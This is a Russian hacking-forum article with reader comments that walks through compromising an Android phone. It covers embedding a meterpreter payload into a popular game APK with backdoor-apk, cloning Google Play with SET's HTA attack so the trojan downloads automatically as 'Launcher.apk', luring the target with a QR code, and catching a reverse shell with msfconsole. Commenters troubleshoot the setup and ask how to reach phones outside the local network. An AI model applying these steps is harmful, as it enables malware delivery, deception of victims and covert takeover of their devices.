• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Взлом Android - устройства. (Backdoor-apk + HTA server)

Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.

upload_2016-12-5_13-26-37.png


Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:

> git clone https://github.com/dana-at-cp/backdoor-apk.git

upload_2016-12-5_13-27-3.png


Затем установим все необходимые библиотеки.

> apt-get install lib32stdc++6 lib32ncurses5 lib32z1

upload_2016-12-5_13-27-30.png


Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.

Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.


Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.

Качаем именно эту версию, так как другие я просто не пробовал:

upload_2016-12-5_13-29-42.png


Сохраняем файл:

upload_2016-12-5_13-30-4.png


Затем скопируем файл в папку с установленным Backdoor-apk.

upload_2016-12-5_13-30-20.png


Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:

> cd backdoor-apk

> cd backdoor-apk

> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)

upload_2016-12-5_13-30-55.png


Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.

upload_2016-12-5_13-31-17.png


Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist

upload_2016-12-5_13-31-53.png

upload_2016-12-5_13-31-59.png


На этом пока остановимся.

Пришло время запустить SET - Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:


> setoolkit

Выбираем:

upload_2016-12-5_13-32-59.png


Выберем Website Attack Vectors.

upload_2016-12-5_13-33-17.png


Нас интересует HTA – Attack Method.

upload_2016-12-5_13-33-53.png


Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.

> https://play.google.com/store


upload_2016-12-5_13-38-50.png


Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.

upload_2016-12-5_13-39-52.png


Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:

· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)

· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

upload_2016-12-5_13-40-34.png


Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.

upload_2016-12-5_13-41-38.png


Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.

Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.

upload_2016-12-5_13-42-7.png


На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:

upload_2016-12-5_13-42-29.png


Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.

upload_2016-12-5_13-42-51.png


Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.

Установим игру.

upload_2016-12-5_13-43-11.png


Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:

> msfconsole –r backdoor-apk.rc

upload_2016-12-5_13-43-39.png


И затем, запустим игру.

upload_2016-12-5_13-44-4.png


В консоли получаем активную сессию meterpreter.

upload_2016-12-5_13-44-20.png


На этом все, спасибо за внимание.
 
S

sainethat

А как это все сделать с телефоном, который не в одной сети?
 
S

sainethat

Можете ссылку скинуть, не видел такую.
 

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
1
Благодарю,тема топовая,автору респект за титанический труд ,особенно с тестированием приложений и выбора оптимального.Давно желал понять технику атак с применением QR Code после увиденной новости,как у подъезда висела реклама с кодом,кто её просматривал,попадал в потенциальные жертвы с заражёным андроидом и последующей утерей денег.Очень опасная штука для тех,кто не увлекается средствами защиты.
 
A

arn

Очень полезная статья! Спасибо, надо будет попробовать на себе:)
 

TechHuk

Green Team
22.01.2017
14
2
BIT
0
Возможно, попробую позже с другим файлом.
Я так думаю мощностей не хватает. Стоить брать файлик маленький - метра на 2-3 максимум.
Не вышло, также висит на декомпиляции. Думаю это из-за архитектуры armhf. Может кто подскажет необходимый набор библиотек lib32stdc++6 lib32ncurses5 lib32z1 под armhf?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Не вышло, также висит на декомпиляции.

Вист без видимых реакций? Системные требования могут не удовлетворять, декомпиляция процес трудемкий, система банально может не справляться с нагрузкой. Иногда надо подажадть часик другой =)
 

TechHuk

Green Team
22.01.2017
14
2
BIT
0
Вист без видимых реакций? Системные требования могут не удовлетворять, декомпиляция процес трудемкий, система банально может не справляться с нагрузкой. Иногда надо подажадть часик другой =)
Помогло, теперь другая проблема..
_20170320_212716.JPG
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Другой берем, иногда можно десяток apk перепробовать, пока сработает.
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
Всем привет,решил тоже попробовать,но столкнулся вот с чем, когда гаснет экран отваливается сессия, андройд 4.2.2 , может кто знает как решить данную проблему?
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
множества , от es проводника, калькулятор,go Keyboard...с каждым ведет по разному, но в большинстве, сессия отваливается тогда , когда телефон входит в спящий режим.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
множества , от es проводника, калькулятор,go Keyboard...с каждым ведет по разному, но в большинстве, сессия отваливается тогда , когда телефон входит в спящий режим.
Игрушка 2048, работала исправно. так же полагаю будильники должны работать.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!